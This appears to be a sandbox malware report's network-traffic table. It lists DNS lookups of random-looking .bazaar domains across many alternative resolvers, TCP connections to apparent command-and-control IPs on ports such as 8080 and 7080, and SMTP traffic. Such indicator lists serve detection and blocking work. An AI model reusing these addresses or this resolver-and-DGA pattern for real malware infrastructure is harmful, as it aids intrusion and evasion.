| DE | 144.76.133.38:53 | bccfimbdefis.bazaar | udp |
| DE | 139.59.208.246:53 | bccfimbdefis.bazaar | udp |
| DE | 172.104.136.243:53 | bccfimbdefis.bazaar | udp |
| EC | 45.71.112.70:53 | bccfimbdefis.bazaar | udp |
| FR | 163.172.185.51:53 | bccfimbdefis.bazaar | udp |
| FR | 87.98.175.85:53 | bccfimbdefis.bazaar | udp |
| FR | 5.135.183.146:53 | bccfimbdefis.bazaar | udp |
| FR | 51.255.48.78:53 | bccfimbdefis.bazaar | udp |
| FR | 188.165.200.156:53 | bccfimbdefis.bazaar | udp |
| FR | 147.135.185.78:53 | bccfimbdefis.bazaar | udp |
| FR | 92.222.97.145:53 | bccfimbdefis.bazaar | udp |
| FR | 51.255.211.146:53 | bccfimbdefis.bazaar | udp |
| GB | 159.89.249.249:53 | bccfimbdefis.bazaar | udp |
| GB | 104.238.186.189:53 | bccfimbdefis.bazaar | udp |
| IN | 139.59.23.241:53 | bccfimbdefis.bazaar | udp |
| IT | 193.183.98.66:53 | bccfimbdefis.bazaar | udp |
| IT | 94.177.171.127:53 | bccfimbdefis.bazaar | udp |
| JP | 45.63.124.65:53 | bccfimbdefis.bazaar | udp |
| LT | 212.24.98.54:53 | bccfimbdefis.bazaar | udp |
| MD | 178.17.170.179:53 | bccfimbdefis.bazaar | udp |
| NL | 185.208.208.141:53 | bccfimbdefis.bazaar | udp |
| NL | 82.196.9.45:53 | bccfimbdefis.bazaar | udp |
| NL | 146.185.176.36:53 | bccfimbdefis.bazaar | udp |
| SE | 89.35.39.64:53 | bccfimbdefis.bazaar | udp |
| RO | 89.18.27.167:53 | bccfimbdefis.bazaar | udp |
| RU | 77.73.68.161:53 | bccfimbdefis.bazaar | udp |
| RU | 91.217.137.37:53 | bccfimbdefis.bazaar | udp |
| RU | 185.117.154.144:53 | bccfimbdefis.bazaar | udp |
| SE | 176.126.70.119:53 | bccfimbdefis.bazaar | udp |
| SG | 139.99.96.146:53 | bccfimbdefis.bazaar | udp |
| UA | 217.12.210.54:53 | bccfimbdefis.bazaar | udp |
| GB | 185.164.136.225:53 | bccfimbdefis.bazaar | udp |
| US | 192.52.166.110:53 | bccfimbdefis.bazaar | udp |
| US | 63.231.92.27:53 | bccfimbdefis.bazaar | udp |
| CA | 66.70.211.246:53 | bccfimbdefis.bazaar | udp |
| US | 96.47.228.108:53 | bccfimbdefis.bazaar | udp |
| US | 45.32.160.206:53 | bccfimbdefis.bazaar | udp |
| US | 128.52.130.209:53 | bccfimbdefis.bazaar | udp |
| US | 35.196.105.24:53 | bccfimbdefis.bazaar | udp |
| US | 172.98.193.42:53 | bccfimbdefis.bazaar | udp |
| US | 162.248.241.94:53 | bccfimbdefis.bazaar | udp |
| US | 107.172.42.186:53 | bccfimbdefis.bazaar | udp |
| US | 167.99.153.82:53 | bccfimbdefis.bazaar | udp |
| US | 138.197.25.214:53 | bccfimbdefis.bazaar | udp |
| US | 69.164.196.21:53 | bccfimbdefis.bazaar | udp |
| FR | 51.254.25.115:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 193.183.98.66:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 91.217.137.37:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 87.98.175.85:53 | ^`egjkzaggjq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| AT | 185.121.177.177:53 | ^`egjkzaggjq.bazaar | udp |
| ZA | 169.239.202.202:53 | ^`egjkzaggjq.bazaar | udp |
| US | 198.251.90.143:53 | ^`egjkzaggjq.bazaar | udp |
| AT | 5.132.191.104:53 | ^`egjkzaggjq.bazaar | udp |
| AU | 111.67.20.8:53 | ^`egjkzaggjq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| AU | 163.53.248.170:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 142.4.204.111:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 142.4.205.47:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 158.69.239.167:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 104.37.195.178:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 192.99.85.244:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 158.69.160.164:53 | ^`egjkzaggjq.bazaar | udp |
| CH | 46.28.207.199:53 | ^`egjkzaggjq.bazaar | udp |
| CH | 31.171.251.118:53 | ^`egjkzaggjq.bazaar | udp |
| CZ | 81.2.241.148:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.254.25.115:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 82.141.39.32:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 50.3.82.215:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 46.101.70.183:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 5.45.97.127:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 130.255.78.223:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 144.76.133.38:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 139.59.208.246:53 | ^`egjkzaggjq.bazaar | udp |
| DE | 172.104.136.243:53 | ^`egjkzaggjq.bazaar | udp |
| EC | 45.71.112.70:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 163.172.185.51:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 87.98.175.85:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 5.135.183.146:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.255.48.78:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 188.165.200.156:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 147.135.185.78:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 92.222.97.145:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.255.211.146:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 159.89.249.249:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 104.238.186.189:53 | ^`egjkzaggjq.bazaar | udp |
| IN | 139.59.23.241:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 193.183.98.66:53 | ^`egjkzaggjq.bazaar | udp |
| IT | 94.177.171.127:53 | ^`egjkzaggjq.bazaar | udp |
| JP | 45.63.124.65:53 | ^`egjkzaggjq.bazaar | udp |
| LT | 212.24.98.54:53 | ^`egjkzaggjq.bazaar | udp |
| MD | 178.17.170.179:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 185.208.208.141:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 82.196.9.45:53 | ^`egjkzaggjq.bazaar | udp |
| NL | 146.185.176.36:53 | ^`egjkzaggjq.bazaar | udp |
| SE | 89.35.39.64:53 | ^`egjkzaggjq.bazaar | udp |
| RO | 89.18.27.167:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 77.73.68.161:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 91.217.137.37:53 | ^`egjkzaggjq.bazaar | udp |
| RU | 185.117.154.144:53 | ^`egjkzaggjq.bazaar | udp |
| SE | 176.126.70.119:53 | ^`egjkzaggjq.bazaar | udp |
| SG | 139.99.96.146:53 | ^`egjkzaggjq.bazaar | udp |
| UA | 217.12.210.54:53 | ^`egjkzaggjq.bazaar | udp |
| GB | 185.164.136.225:53 | ^`egjkzaggjq.bazaar | udp |
| US | 192.52.166.110:53 | ^`egjkzaggjq.bazaar | udp |
| US | 63.231.92.27:53 | ^`egjkzaggjq.bazaar | udp |
| CA | 66.70.211.246:53 | ^`egjkzaggjq.bazaar | udp |
| US | 96.47.228.108:53 | ^`egjkzaggjq.bazaar | udp |
| US | 45.32.160.206:53 | ^`egjkzaggjq.bazaar | udp |
| US | 128.52.130.209:53 | ^`egjkzaggjq.bazaar | udp |
| US | 35.196.105.24:53 | ^`egjkzaggjq.bazaar | udp |
| US | 172.98.193.42:53 | ^`egjkzaggjq.bazaar | udp |
| US | 162.248.241.94:53 | ^`egjkzaggjq.bazaar | udp |
| US | 107.172.42.186:53 | ^`egjkzaggjq.bazaar | udp |
| US | 167.99.153.82:53 | ^`egjkzaggjq.bazaar | udp |
| US | 138.197.25.214:53 | ^`egjkzaggjq.bazaar | udp |
| US | 69.164.196.21:53 | ^`egjkzaggjq.bazaar | udp |
| FR | 51.254.25.115:53 | `beghkzcgghq.bazaar | udp |
| IT | 193.183.98.66:53 | `beghkzcgghq.bazaar | udp |
| RU | 91.217.137.37:53 | `beghkzcgghq.bazaar | udp |
| FR | 87.98.175.85:53 | `beghkzcgghq.bazaar | udp |
| AT | 185.121.177.177:53 | `beghkzcgghq.bazaar | udp |
| ZA | 169.239.202.202:53 | `beghkzcgghq.bazaar | udp |
| US | 198.251.90.143:53 | `beghkzcgghq.bazaar | udp |
| US | 71.197.211.156:80 | tcp | |
| AT | 5.132.191.104:53 | `beghkzcgghq.bazaar | udp |
| AU | 111.67.20.8:53 | `beghkzcgghq.bazaar | udp |
| AU | 163.53.248.170:53 | `beghkzcgghq.bazaar | udp |
| CA | 142.4.204.111:53 | `beghkzcgghq.bazaar | udp |
| CA | 142.4.205.47:53 | `beghkzcgghq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| CA | 158.69.239.167:53 | `beghkzcgghq.bazaar | udp |
| CA | 104.37.195.178:53 | `beghkzcgghq.bazaar | udp |
| CA | 192.99.85.244:53 | `beghkzcgghq.bazaar | udp |
| CA | 158.69.160.164:53 | `beghkzcgghq.bazaar | udp |
| KR | 121.124.124.40:7080 | tcp | |
| CH | 46.28.207.199:53 | `beghkzcgghq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| CH | 31.171.251.118:53 | `beghkzcgghq.bazaar | udp |
| CZ | 81.2.241.148:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.254.25.115:53 | `beghkzcgghq.bazaar | udp |
| DE | 82.141.39.32:53 | `beghkzcgghq.bazaar | udp |
| DE | 50.3.82.215:53 | `beghkzcgghq.bazaar | udp |
| DE | 46.101.70.183:53 | `beghkzcgghq.bazaar | udp |
| DE | 5.45.97.127:53 | `beghkzcgghq.bazaar | udp |
| DE | 130.255.78.223:53 | `beghkzcgghq.bazaar | udp |
| DE | 144.76.133.38:53 | `beghkzcgghq.bazaar | udp |
| DE | 139.59.208.246:53 | `beghkzcgghq.bazaar | udp |
| DE | 172.104.136.243:53 | `beghkzcgghq.bazaar | udp |
| MY | 219.92.8.17:8080 | tcp | |
| EC | 45.71.112.70:53 | `beghkzcgghq.bazaar | udp |
| FR | 163.172.185.51:53 | `beghkzcgghq.bazaar | udp |
| FR | 87.98.175.85:53 | `beghkzcgghq.bazaar | udp |
| FR | 5.135.183.146:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.255.48.78:53 | `beghkzcgghq.bazaar | udp |
| FR | 188.165.200.156:53 | `beghkzcgghq.bazaar | udp |
| FR | 147.135.185.78:53 | `beghkzcgghq.bazaar | udp |
| FR | 92.222.97.145:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.255.211.146:53 | `beghkzcgghq.bazaar | udp |
| JP | 114.146.222.200:80 | tcp | |
| US | 206.51.202.106:50003 | tcp | |
| GB | 159.89.249.249:53 | `beghkzcgghq.bazaar | udp |
| GB | 104.238.186.189:53 | `beghkzcgghq.bazaar | udp |
| IN | 139.59.23.241:53 | `beghkzcgghq.bazaar | udp |
| IT | 193.183.98.66:53 | `beghkzcgghq.bazaar | udp |
| IT | 94.177.171.127:53 | `beghkzcgghq.bazaar | udp |
| JP | 45.63.124.65:53 | `beghkzcgghq.bazaar | udp |
| LT | 212.24.98.54:53 | `beghkzcgghq.bazaar | udp |
| AR | 152.169.22.67:80 | tcp | |
| MD | 178.17.170.179:53 | `beghkzcgghq.bazaar | udp |
| NL | 185.208.208.141:53 | `beghkzcgghq.bazaar | udp |
| NL | 82.196.9.45:53 | `beghkzcgghq.bazaar | udp |
| NL | 146.185.176.36:53 | `beghkzcgghq.bazaar | udp |
| SE | 89.35.39.64:53 | `beghkzcgghq.bazaar | udp |
| RO | 89.18.27.167:53 | `beghkzcgghq.bazaar | udp |
| RU | 77.73.68.161:53 | `beghkzcgghq.bazaar | udp |
| RU | 91.217.137.37:53 | `beghkzcgghq.bazaar | udp |
| RU | 185.117.154.144:53 | `beghkzcgghq.bazaar | udp |
| SE | 176.126.70.119:53 | `beghkzcgghq.bazaar | udp |
| RU | 176.96.238.128:443 | tcp | |
| SG | 139.99.96.146:53 | `beghkzcgghq.bazaar | udp |
| US | 206.51.202.106:50003 | tcp | |
| UA | 217.12.210.54:53 | `beghkzcgghq.bazaar | udp |
| GB | 185.164.136.225:53 | `beghkzcgghq.bazaar | udp |
| US | 192.52.166.110:53 | `beghkzcgghq.bazaar | udp |
| US | 63.231.92.27:53 | `beghkzcgghq.bazaar | udp |
| CA | 66.70.211.246:53 | `beghkzcgghq.bazaar | udp |
| US | 96.47.228.108:53 | `beghkzcgghq.bazaar | udp |
| US | 45.32.160.206:53 | `beghkzcgghq.bazaar | udp |
| US | 128.52.130.209:53 | `beghkzcgghq.bazaar | udp |
| US | 35.196.105.24:53 | `beghkzcgghq.bazaar | udp |
| US | 172.98.193.42:53 | `beghkzcgghq.bazaar | udp |
| US | 162.248.241.94:53 | `beghkzcgghq.bazaar | udp |
| US | 107.172.42.186:53 | `beghkzcgghq.bazaar | udp |
| US | 167.99.153.82:53 | `beghkzcgghq.bazaar | udp |
| US | 138.197.25.214:53 | `beghkzcgghq.bazaar | udp |
| US | 69.164.196.21:53 | `beghkzcgghq.bazaar | udp |
| FR | 51.254.25.115:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 193.183.98.66:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 91.217.137.37:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 87.98.175.85:53 | `efgjmzfhgjs.bazaar | udp |
| AT | 185.121.177.177:53 | `efgjmzfhgjs.bazaar | udp |
| ZA | 169.239.202.202:53 | `efgjmzfhgjs.bazaar | udp |
| US | 198.251.90.143:53 | `efgjmzfhgjs.bazaar | udp |
| AT | 5.132.191.104:53 | `efgjmzfhgjs.bazaar | udp |
| AU | 111.67.20.8:53 | `efgjmzfhgjs.bazaar | udp |
| AU | 163.53.248.170:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 142.4.204.111:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 142.4.205.47:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 158.69.239.167:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 104.37.195.178:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 192.99.85.244:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 158.69.160.164:53 | `efgjmzfhgjs.bazaar | udp |
| CH | 46.28.207.199:53 | `efgjmzfhgjs.bazaar | udp |
| CH | 31.171.251.118:53 | `efgjmzfhgjs.bazaar | udp |
| CZ | 81.2.241.148:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.254.25.115:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 82.141.39.32:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 50.3.82.215:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 46.101.70.183:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 5.45.97.127:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 130.255.78.223:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 144.76.133.38:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 139.59.208.246:53 | `efgjmzfhgjs.bazaar | udp |
| DE | 172.104.136.243:53 | `efgjmzfhgjs.bazaar | udp |
| EC | 45.71.112.70:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 163.172.185.51:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 87.98.175.85:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 5.135.183.146:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.255.48.78:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 188.165.200.156:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 147.135.185.78:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 92.222.97.145:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.255.211.146:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 159.89.249.249:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 104.238.186.189:53 | `efgjmzfhgjs.bazaar | udp |
| IN | 139.59.23.241:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 193.183.98.66:53 | `efgjmzfhgjs.bazaar | udp |
| IT | 94.177.171.127:53 | `efgjmzfhgjs.bazaar | udp |
| JP | 45.63.124.65:53 | `efgjmzfhgjs.bazaar | udp |
| LT | 212.24.98.54:53 | `efgjmzfhgjs.bazaar | udp |
| MD | 178.17.170.179:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 185.208.208.141:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 82.196.9.45:53 | `efgjmzfhgjs.bazaar | udp |
| NL | 146.185.176.36:53 | `efgjmzfhgjs.bazaar | udp |
| SE | 89.35.39.64:53 | `efgjmzfhgjs.bazaar | udp |
| RO | 89.18.27.167:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 77.73.68.161:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 91.217.137.37:53 | `efgjmzfhgjs.bazaar | udp |
| RU | 185.117.154.144:53 | `efgjmzfhgjs.bazaar | udp |
| SE | 176.126.70.119:53 | `efgjmzfhgjs.bazaar | udp |
| SG | 139.99.96.146:53 | `efgjmzfhgjs.bazaar | udp |
| UA | 217.12.210.54:53 | `efgjmzfhgjs.bazaar | udp |
| GB | 185.164.136.225:53 | `efgjmzfhgjs.bazaar | udp |
| US | 192.52.166.110:53 | `efgjmzfhgjs.bazaar | udp |
| US | 63.231.92.27:53 | `efgjmzfhgjs.bazaar | udp |
| CA | 66.70.211.246:53 | `efgjmzfhgjs.bazaar | udp |
| US | 96.47.228.108:53 | `efgjmzfhgjs.bazaar | udp |
| US | 45.32.160.206:53 | `efgjmzfhgjs.bazaar | udp |
| US | 128.52.130.209:53 | `efgjmzfhgjs.bazaar | udp |
| US | 35.196.105.24:53 | `efgjmzfhgjs.bazaar | udp |
| US | 172.98.193.42:53 | `efgjmzfhgjs.bazaar | udp |
| US | 162.248.241.94:53 | `efgjmzfhgjs.bazaar | udp |
| US | 107.172.42.186:53 | `efgjmzfhgjs.bazaar | udp |
| US | 167.99.153.82:53 | `efgjmzfhgjs.bazaar | udp |
| US | 138.197.25.214:53 | `efgjmzfhgjs.bazaar | udp |
| US | 69.164.196.21:53 | `efgjmzfhgjs.bazaar | udp |
| FR | 51.254.25.115:53 | bcegkkbdggkq.bazaar | udp |
| IT | 193.183.98.66:53 | bcegkkbdggkq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| RU | 91.217.137.37:53 | bcegkkbdggkq.bazaar | udp |
| FR | 87.98.175.85:53 | bcegkkbdggkq.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| UA | 91.219.169.180:80 | tcp | |
| AT | 185.121.177.177:53 | bcegkkbdggkq.bazaar | udp |
| ZA | 169.239.202.202:53 | bcegkkbdggkq.bazaar | udp |
| US | 198.251.90.143:53 | bcegkkbdggkq.bazaar | udp |
| AT | 5.132.191.104:53 | bcegkkbdggkq.bazaar | udp |
| AU | 111.67.20.8:53 | bcegkkbdggkq.bazaar | udp |
| AU | 163.53.248.170:53 | bcegkkbdggkq.bazaar | udp |
| CA | 142.4.204.111:53 | bcegkkbdggkq.bazaar | udp |
| CA | 142.4.205.47:53 | bcegkkbdggkq.bazaar | udp |
| CA | 158.69.239.167:53 | bcegkkbdggkq.bazaar | udp |
| CA | 104.37.195.178:53 | bcegkkbdggkq.bazaar | udp |
| CA | 192.99.85.244:53 | bcegkkbdggkq.bazaar | udp |
| CA | 158.69.160.164:53 | bcegkkbdggkq.bazaar | udp |
| CH | 46.28.207.199:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| CH | 31.171.251.118:53 | bcegkkbdggkq.bazaar | udp |
| CZ | 81.2.241.148:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.254.25.115:53 | bcegkkbdggkq.bazaar | udp |
| DE | 82.141.39.32:53 | bcegkkbdggkq.bazaar | udp |
| DE | 50.3.82.215:53 | bcegkkbdggkq.bazaar | udp |
| DE | 46.101.70.183:53 | bcegkkbdggkq.bazaar | udp |
| DE | 5.45.97.127:53 | bcegkkbdggkq.bazaar | udp |
| DE | 130.255.78.223:53 | bcegkkbdggkq.bazaar | udp |
| DE | 144.76.133.38:53 | bcegkkbdggkq.bazaar | udp |
| DE | 139.59.208.246:53 | bcegkkbdggkq.bazaar | udp |
| DE | 172.104.136.243:53 | bcegkkbdggkq.bazaar | udp |
| EC | 45.71.112.70:53 | bcegkkbdggkq.bazaar | udp |
| IN | 157.245.99.39:8080 | tcp | |
| FR | 163.172.185.51:53 | bcegkkbdggkq.bazaar | udp |
| FR | 87.98.175.85:53 | bcegkkbdggkq.bazaar | udp |
| FR | 5.135.183.146:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.48.78:53 | bcegkkbdggkq.bazaar | udp |
| FR | 188.165.200.156:53 | bcegkkbdggkq.bazaar | udp |
| FR | 147.135.185.78:53 | bcegkkbdggkq.bazaar | udp |
| FR | 92.222.97.145:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.211.146:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| GB | 159.89.249.249:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.255.165.160:8080 | tcp | |
| GB | 104.238.186.189:53 | bcegkkbdggkq.bazaar | udp |
| IN | 139.59.23.241:53 | bcegkkbdggkq.bazaar | udp |
| IT | 193.183.98.66:53 | bcegkkbdggkq.bazaar | udp |
| IT | 94.177.171.127:53 | bcegkkbdggkq.bazaar | udp |
| JP | 45.63.124.65:53 | bcegkkbdggkq.bazaar | udp |
| LT | 212.24.98.54:53 | bcegkkbdggkq.bazaar | udp |
| MD | 178.17.170.179:53 | bcegkkbdggkq.bazaar | udp |
| NL | 185.208.208.141:53 | bcegkkbdggkq.bazaar | udp |
| US | 76.27.179.47:80 | tcp | |
| NL | 82.196.9.45:53 | bcegkkbdggkq.bazaar | udp |
| NL | 146.185.176.36:53 | bcegkkbdggkq.bazaar | udp |
| SE | 89.35.39.64:53 | bcegkkbdggkq.bazaar | udp |
| RO | 89.18.27.167:53 | bcegkkbdggkq.bazaar | udp |
| RU | 77.73.68.161:53 | bcegkkbdggkq.bazaar | udp |
| RU | 91.217.137.37:53 | bcegkkbdggkq.bazaar | udp |
| RU | 185.117.154.144:53 | bcegkkbdggkq.bazaar | udp |
| SE | 176.126.70.119:53 | bcegkkbdggkq.bazaar | udp |
| SG | 139.99.96.146:53 | bcegkkbdggkq.bazaar | udp |
| UA | 217.12.210.54:53 | bcegkkbdggkq.bazaar | udp |
| GB | 185.164.136.225:53 | bcegkkbdggkq.bazaar | udp |
| US | 192.52.166.110:53 | bcegkkbdggkq.bazaar | udp |
| US | 63.231.92.27:53 | bcegkkbdggkq.bazaar | udp |
| CA | 66.70.211.246:53 | bcegkkbdggkq.bazaar | udp |
| US | 96.47.228.108:53 | bcegkkbdggkq.bazaar | udp |
| US | 45.32.160.206:53 | bcegkkbdggkq.bazaar | udp |
| US | 128.52.130.209:53 | bcegkkbdggkq.bazaar | udp |
| US | 35.196.105.24:53 | bcegkkbdggkq.bazaar | udp |
| US | 172.98.193.42:53 | bcegkkbdggkq.bazaar | udp |
| US | 162.248.241.94:53 | bcegkkbdggkq.bazaar | udp |
| US | 107.172.42.186:53 | bcegkkbdggkq.bazaar | udp |
| US | 167.99.153.82:53 | bcegkkbdggkq.bazaar | udp |
| US | 138.197.25.214:53 | bcegkkbdggkq.bazaar | udp |
| US | 69.164.196.21:53 | bcegkkbdggkq.bazaar | udp |
| FR | 51.254.25.115:53 | dechkjdfehkp.bazaar | udp |
| IT | 193.183.98.66:53 | dechkjdfehkp.bazaar | udp |
| RU | 91.217.137.37:53 | dechkjdfehkp.bazaar | udp |
| FR | 87.98.175.85:53 | dechkjdfehkp.bazaar | udp |
| AT | 185.121.177.177:53 | dechkjdfehkp.bazaar | udp |
| UA | 77.52.245.101:8008 | tcp | |
| US | 76.111.128.194:443 | tcp | |
| ZA | 169.239.202.202:53 | dechkjdfehkp.bazaar | udp |
| US | 198.251.90.143:53 | dechkjdfehkp.bazaar | udp |
| AT | 5.132.191.104:53 | dechkjdfehkp.bazaar | udp |
| AU | 111.67.20.8:53 | dechkjdfehkp.bazaar | udp |
| AU | 163.53.248.170:53 | dechkjdfehkp.bazaar | udp |
| CA | 142.4.204.111:53 | dechkjdfehkp.bazaar | udp |
| CA | 142.4.205.47:53 | dechkjdfehkp.bazaar | udp |
| CA | 158.69.239.167:53 | dechkjdfehkp.bazaar | udp |
| CA | 104.37.195.178:53 | dechkjdfehkp.bazaar | udp |
| CA | 192.99.85.244:53 | dechkjdfehkp.bazaar | udp |
| BR | 170.81.48.2:80 | tcp | |
| CA | 158.69.160.164:53 | dechkjdfehkp.bazaar | udp |
| CH | 46.28.207.199:53 | dechkjdfehkp.bazaar | udp |
| CH | 31.171.251.118:53 | dechkjdfehkp.bazaar | udp |
| CZ | 81.2.241.148:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.254.25.115:53 | dechkjdfehkp.bazaar | udp |
| DE | 82.141.39.32:53 | dechkjdfehkp.bazaar | udp |
| DE | 50.3.82.215:53 | dechkjdfehkp.bazaar | udp |
| DE | 46.101.70.183:53 | dechkjdfehkp.bazaar | udp |
| DE | 5.45.97.127:53 | dechkjdfehkp.bazaar | udp |
| DE | 130.255.78.223:53 | dechkjdfehkp.bazaar | udp |
| DE | 144.76.133.38:53 | dechkjdfehkp.bazaar | udp |
| DE | 139.59.208.246:53 | dechkjdfehkp.bazaar | udp |
| DE | 172.104.136.243:53 | dechkjdfehkp.bazaar | udp |
| EC | 45.71.112.70:53 | dechkjdfehkp.bazaar | udp |
| FR | 163.172.185.51:53 | dechkjdfehkp.bazaar | udp |
| FR | 87.98.175.85:53 | dechkjdfehkp.bazaar | udp |
| FR | 5.135.183.146:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.255.48.78:53 | dechkjdfehkp.bazaar | udp |
| FR | 188.165.200.156:53 | dechkjdfehkp.bazaar | udp |
| FR | 147.135.185.78:53 | dechkjdfehkp.bazaar | udp |
| FR | 92.222.97.145:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.255.211.146:53 | dechkjdfehkp.bazaar | udp |
| GB | 159.89.249.249:53 | dechkjdfehkp.bazaar | udp |
| GB | 104.238.186.189:53 | dechkjdfehkp.bazaar | udp |
| IN | 139.59.23.241:53 | dechkjdfehkp.bazaar | udp |
| IT | 193.183.98.66:53 | dechkjdfehkp.bazaar | udp |
| IT | 94.177.171.127:53 | dechkjdfehkp.bazaar | udp |
| JP | 45.63.124.65:53 | dechkjdfehkp.bazaar | udp |
| LT | 212.24.98.54:53 | dechkjdfehkp.bazaar | udp |
| MD | 178.17.170.179:53 | dechkjdfehkp.bazaar | udp |
| NL | 185.208.208.141:53 | dechkjdfehkp.bazaar | udp |
| NL | 82.196.9.45:53 | dechkjdfehkp.bazaar | udp |
| NL | 146.185.176.36:53 | dechkjdfehkp.bazaar | udp |
| SE | 89.35.39.64:53 | dechkjdfehkp.bazaar | udp |
| RO | 89.18.27.167:53 | dechkjdfehkp.bazaar | udp |
| RU | 77.73.68.161:53 | dechkjdfehkp.bazaar | udp |
| RU | 91.217.137.37:53 | dechkjdfehkp.bazaar | udp |
| RU | 185.117.154.144:53 | dechkjdfehkp.bazaar | udp |
| SE | 176.126.70.119:53 | dechkjdfehkp.bazaar | udp |
| SG | 139.99.96.146:53 | dechkjdfehkp.bazaar | udp |
| UA | 217.12.210.54:53 | dechkjdfehkp.bazaar | udp |
| GB | 185.164.136.225:53 | dechkjdfehkp.bazaar | udp |
| US | 192.52.166.110:53 | dechkjdfehkp.bazaar | udp |
| US | 63.231.92.27:53 | dechkjdfehkp.bazaar | udp |
| CA | 66.70.211.246:53 | dechkjdfehkp.bazaar | udp |
| US | 96.47.228.108:53 | dechkjdfehkp.bazaar | udp |
| US | 45.32.160.206:53 | dechkjdfehkp.bazaar | udp |
| US | 128.52.130.209:53 | dechkjdfehkp.bazaar | udp |
| US | 35.196.105.24:53 | dechkjdfehkp.bazaar | udp |
| US | 172.98.193.42:53 | dechkjdfehkp.bazaar | udp |
| US | 162.248.241.94:53 | dechkjdfehkp.bazaar | udp |
| US | 107.172.42.186:53 | dechkjdfehkp.bazaar | udp |
| US | 167.99.153.82:53 | dechkjdfehkp.bazaar | udp |
| US | 138.197.25.214:53 | dechkjdfehkp.bazaar | udp |
| US | 69.164.196.21:53 | dechkjdfehkp.bazaar | udp |
| FR | 51.254.25.115:53 | `achikzbehiq.bazaar | udp |
| IT | 193.183.98.66:53 | `achikzbehiq.bazaar | udp |
| RU | 91.217.137.37:53 | `achikzbehiq.bazaar | udp |
| FR | 87.98.175.85:53 | `achikzbehiq.bazaar | udp |
| AT | 185.121.177.177:53 | `achikzbehiq.bazaar | udp |
| US | 76.111.128.194:443 | tcp | |
| ZA | 169.239.202.202:53 | `achikzbehiq.bazaar | udp |
| US | 198.251.90.143:53 | `achikzbehiq.bazaar | udp |
| BE | 74.125.206.16:465 | smtp.googlemail.com | tcp |
| AT | 5.132.191.104:53 | `achikzbehiq.bazaar | udp |
| AU | 111.67.20.8:53 | `achikzbehiq.bazaar | udp |
| AU | 163.53.248.170:53 | `achikzbehiq.bazaar | udp |
